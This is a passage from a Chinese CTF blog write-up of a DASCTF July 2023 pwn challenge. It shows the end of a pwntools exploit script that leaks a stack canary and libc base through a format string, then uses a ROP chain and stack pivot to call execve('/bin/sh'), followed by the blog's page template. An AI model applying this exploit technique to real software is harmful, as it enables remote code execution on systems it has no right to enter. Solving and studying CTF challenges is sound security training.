class="hljs-number">0x000000000040147b</span><br><br>leak_canary()<br><br>p.recvuntil(<span class="hljs-string">&#x27;gift!&#x27;</span>)<br>canary = <span class="hljs-built_in">int</span>(p.recv(<span class="hljs-number">18</span>), <span class="hljs-number">16</span>)<br>lg(<span class="hljs-string">&#x27;canary&#x27;</span>, canary)<br><br>logout()<br><br><span class="hljs-comment"># dbg()</span><br><br>payload = flat(<br>    &#123;<br>        <span class="hljs-number">0</span>: <span class="hljs-string">&quot;l1s00t%11$p%15$p&quot;</span>, <br>        <span class="hljs-number">0x40</span>: [<br>            canary, <span class="hljs-number">0</span>, myprintf, <span class="hljs-number">0</span>, start<br>        ]<br>    &#125;, filler=<span class="hljs-string">&#x27;\x00&#x27;</span><br>)<br>login(<span class="hljs-string">&#x27;admin\x00&#x27;</span>, payload)<br><br>p.recvuntil(<span class="hljs-string">&#x27;l1s00t&#x27;</span>)<br>libc_base = <span class="hljs-built_in">int</span>(p.recv(<span class="hljs-number">14</span>), <span class="hljs-number">16</span>) - <span class="hljs-number">0x29d90</span><br>lg(<span class="hljs-string">&#x27;libc_base&#x27;</span>, libc_base)<br><br>stack = <span class="hljs-built_in">int</span>(p.recv(<span class="hljs-number">14</span>), <span class="hljs-number">16</span>) - <span class="hljs-number">0x508</span>     <span class="hljs-comment"># login stack</span><br>lg(<span class="hljs-string">&#x27;stack&#x27;</span>, stack)<br><br>logout()<br><br><span class="hljs-comment"># dbg()</span><br><br>pop_rdi_ret = libc_base + <span class="hljs-number">0x000000000002a3e5</span><br>pop_rsi_ret = libc_base + <span class="hljs-number">0x000000000002be51</span><br>pop_rdx_rbx_ret = libc_base + <span class="hljs-number">0x0000000000090529</span><br>system = libc_base + libc.sym[<span class="hljs-string">&#x27;system&#x27;</span>]<br>execve = libc_base + libc.sym[<span class="hljs-string">&#x27;execve&#x27;</span>]<br><br>payload1 = flat(<br>    &#123;<br>        <span class="hljs-number">0</span>: <span class="hljs-string">&#x27;admin&#x27;</span>,<br>        <span class="hljs-number">0x8</span>: <span class="hljs-string">&#x27;/bin/sh&#x27;</span>,<br>        <span class="hljs-number">0x18</span>: [<br>            pop_rdi_ret, stack + <span class="hljs-number">0x8</span>, <br>            pop_rsi_ret, <span class="hljs-number">0</span>,<br>            pop_rdx_rbx_ret, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>,<br>            execve<br>        ]<br>    &#125;, filler=<span class="hljs-string">&#x27;\x00&#x27;</span>, length=<span class="hljs-number">0x60</span><br>)<br><br>payload2 = flat(<br>    &#123;<br>        <span class="hljs-number">0</span>: <span class="hljs-string">&quot;l1s00t&quot;</span>, <br>        <span class="hljs-number">0x40</span>: [<br>            canary, stack + <span class="hljs-number">0x10</span>, leave_ret<br>        ]<br>    &#125;, filler=<span class="hljs-string">&#x27;\x00&#x27;</span><br>)<br>login(payload1, payload2)<br><br><br>p.interactive()<br><br></code></pre></td></tr></table></figure>

<p><img src="/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725101007541.png" srcset="/img/loading.gif" lazyload alt="image-20230725101007541"></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/PWN/" class="category-chain-item">PWN</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/pwn/">#pwn</a>
      
        <a href="/tags/wp/">#wp</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>2023-dasctf7月部分复现-pwn</div>
      <div>http://example.com/2023/07/23/2023-dasctf7月部分复现-pwn/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>l1s00t</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年7月23日</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>更新于</div>
          <div>2023年7月25日</div>
        </div>
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/07/30/CVE-2021-34730-RV110W-upnp%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" title="CVE-2021-34730-RV110W-upnp漏洞分析">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">CVE-2021-34730-RV110W-upnp漏洞分析</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/07/23/2023-%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A2%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/" title="2023-巅峰极客部分复现-pwn">
                        <span class="hidden-mobile">2023-巅峰极客部分复现-pwn</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      

    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
